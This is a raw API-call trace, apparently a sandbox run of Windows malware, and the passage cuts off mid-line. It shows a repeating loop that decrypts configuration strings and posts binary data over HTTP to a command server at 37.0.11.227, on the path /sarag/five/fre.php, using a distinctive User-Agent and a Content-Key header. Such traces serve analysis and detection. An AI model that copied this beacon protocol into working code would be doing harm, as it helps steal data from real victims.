[0205.607] GetProcessHeap () returned 0x690000 [0205.607] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0205.607] GetProcessHeap () returned 0x690000 [0205.607] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0205.611] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xdac) returned 0x488 [0205.614] Sleep (dwMilliseconds=0xea60) [0205.615] GetProcessHeap () returned 0x690000 [0205.615] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0205.616] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.616] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0205.628] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.629] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0205.639] GetProcessHeap () returned 0x690000 [0205.639] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0205.640] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.650] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0205.651] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.651] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0205.654] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.654] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0205.654] GetProcessHeap () returned 0x690000 [0205.655] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0205.655] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.656] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0205.657] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.657] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0205.658] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.659] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0205.659] GetProcessHeap () returned 0x690000 [0205.659] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0205.660] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.660] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0205.661] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.661] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0205.664] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.664] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0205.665] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.665] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0205.665] GetProcessHeap () returned 0x690000 [0205.665] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0205.666] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0205.666] GetProcessHeap () returned 0x690000 [0205.667] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0205.667] GetProcessHeap () returned 0x690000 [0205.667] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0205.667] GetProcessHeap () returned 0x690000 [0205.668] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0205.668] GetProcessHeap () returned 0x690000 [0205.668] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0205.669] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.669] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0205.675] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.676] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0205.682] GetProcessHeap () returned 0x690000 [0205.682] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0205.683] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.683] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0205.684] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.684] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0205.687] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.688] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0205.688] GetProcessHeap () returned 0x690000 [0205.688] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0205.702] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.703] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0205.703] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.704] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0205.704] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.705] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0205.705] GetProcessHeap () returned 0x690000 [0205.705] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0205.706] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.706] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0205.715] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.716] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0205.717] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.718] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0205.718] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.719] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0205.719] GetProcessHeap () returned 0x690000 [0205.719] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0205.719] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6adf40*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae988*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0205.719] GetProcessHeap () returned 0x690000 [0205.719] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3f0 [0205.719] socket (af=2, type=1, protocol=6) returned 0x48c [0205.720] connect (s=0x48c, name=0x6ae988*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0205.753] FreeAddrInfoW (pAddrInfo=0x6adf40*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae988*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0205.753] GetProcessHeap () returned 0x690000 [0205.753] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0205.753] GetProcessHeap () returned 0x690000 [0205.753] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0205.756] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0205.757] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0205.757] GetProcessHeap () returned 0x690000 [0205.757] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af980 [0205.757] GetProcessHeap () returned 0x690000 [0205.758] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0205.758] GetProcessHeap () returned 0x690000 [0205.758] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0205.758] GetProcessHeap () returned 0x690000 [0205.758] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0205.759] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0205.759] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0205.759] GetProcessHeap () returned 0x690000 [0205.759] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0205.759] GetProcessHeap () returned 0x690000 [0205.760] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0205.760] send (s=0x48c, buf=0x6abd08*, len=242, flags=0) returned 242 [0205.760] send (s=0x48c, buf=0x6aba40*, len=159, flags=0) returned 159 [0205.760] GetProcessHeap () returned 0x690000 [0205.760] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0205.760] recv (in: s=0x48c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0205.839] GetProcessHeap () returned 0x690000 [0205.840] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0205.840] GetProcessHeap () returned 0x690000 [0205.840] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0205.841] GetProcessHeap () returned 0x690000 [0205.841] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af980 | out: hHeap=0x690000) returned 1 [0205.844] GetProcessHeap () returned 0x690000 [0205.845] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0205.845] closesocket (s=0x48c) returned 0 [0205.845] GetProcessHeap () returned 0x690000 [0205.845] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3f0 | out: hHeap=0x690000) returned 1 [0205.845] GetProcessHeap () returned 0x690000 [0205.846] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0205.846] GetProcessHeap () returned 0x690000 [0205.846] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0205.846] GetProcessHeap () returned 0x690000 [0205.846] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0205.847] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x89c) returned 0x48c [0205.849] Sleep (dwMilliseconds=0xea60) [0205.850] GetProcessHeap () returned 0x690000 [0205.850] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0205.852] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.852] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0205.917] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.917] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0205.925] GetProcessHeap () returned 0x690000 [0205.925] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0205.926] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.926] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0205.927] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.927] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0205.928] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.928] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0205.928] GetProcessHeap () returned 0x690000 [0205.928] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0205.929] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.929] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0205.930] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.930] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0205.931] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.931] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0205.931] GetProcessHeap () returned 0x690000 [0205.931] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0205.932] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.932] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0205.932] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.933] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0205.933] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.933] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0205.934] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.935] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0205.935] GetProcessHeap () returned 0x690000 [0205.935] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0205.935] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0205.935] GetProcessHeap () returned 0x690000 [0205.935] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0205.939] GetProcessHeap () returned 0x690000 [0205.939] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0205.939] GetProcessHeap () returned 0x690000 [0205.940] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0205.940] GetProcessHeap () returned 0x690000 [0205.940] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0205.940] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.940] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0205.947] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.947] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0205.952] GetProcessHeap () returned 0x690000 [0205.952] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0205.953] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.955] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0205.955] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.956] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0205.956] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.957] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0205.957] GetProcessHeap () returned 0x690000 [0205.957] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0205.958] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.958] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0205.959] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.959] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0205.960] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0205.960] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0205.960] GetProcessHeap () returned 0x690000 [0205.960] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0205.961] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.961] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0205.962] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.962] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0205.962] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.963] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0205.963] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0205.964] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0205.964] GetProcessHeap () returned 0x690000 [0205.964] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0205.964] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6ad810*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae970*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0205.966] GetProcessHeap () returned 0x690000 [0205.966] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab460 [0205.966] socket (af=2, type=1, protocol=6) returned 0x490 [0205.966] connect (s=0x490, name=0x6ae970*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0205.988] FreeAddrInfoW (pAddrInfo=0x6ad810*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae970*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0205.988] GetProcessHeap () returned 0x690000 [0205.988] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af188 [0205.988] GetProcessHeap () returned 0x690000 [0205.988] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0205.989] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0205.990] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0205.990] GetProcessHeap () returned 0x690000 [0205.990] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0280 [0205.990] GetProcessHeap () returned 0x690000 [0205.990] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0205.991] GetProcessHeap () returned 0x690000 [0205.991] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0205.991] GetProcessHeap () returned 0x690000 [0205.991] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0205.991] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0205.992] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0205.992] GetProcessHeap () returned 0x690000 [0205.992] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0205.992] GetProcessHeap () returned 0x690000 [0205.992] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0205.992] send (s=0x490, buf=0x6abd08*, len=242, flags=0) returned 242 [0205.993] send (s=0x490, buf=0x6aba40*, len=159, flags=0) returned 159 [0205.993] GetProcessHeap () returned 0x690000 [0205.993] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0205.993] recv (in: s=0x490, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0206.071] GetProcessHeap () returned 0x690000 [0206.071] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0206.075] GetProcessHeap () returned 0x690000 [0206.076] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0206.076] GetProcessHeap () returned 0x690000 [0206.076] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0280 | out: hHeap=0x690000) returned 1 [0206.076] GetProcessHeap () returned 0x690000 [0206.076] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af188 | out: hHeap=0x690000) returned 1 [0206.076] closesocket (s=0x490) returned 0 [0206.077] GetProcessHeap () returned 0x690000 [0206.077] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab460 | out: hHeap=0x690000) returned 1 [0206.077] GetProcessHeap () returned 0x690000 [0206.077] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0206.077] GetProcessHeap () returned 0x690000 [0206.078] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0206.078] GetProcessHeap () returned 0x690000 [0206.078] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0206.078] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xe98) returned 0x490 [0206.080] Sleep (dwMilliseconds=0xea60) [0206.081] GetProcessHeap () returned 0x690000 [0206.081] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0206.082] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0206.082] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0206.088] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0206.088] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0206.095] GetProcessHeap () returned 0x690000 [0206.095] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0206.095] 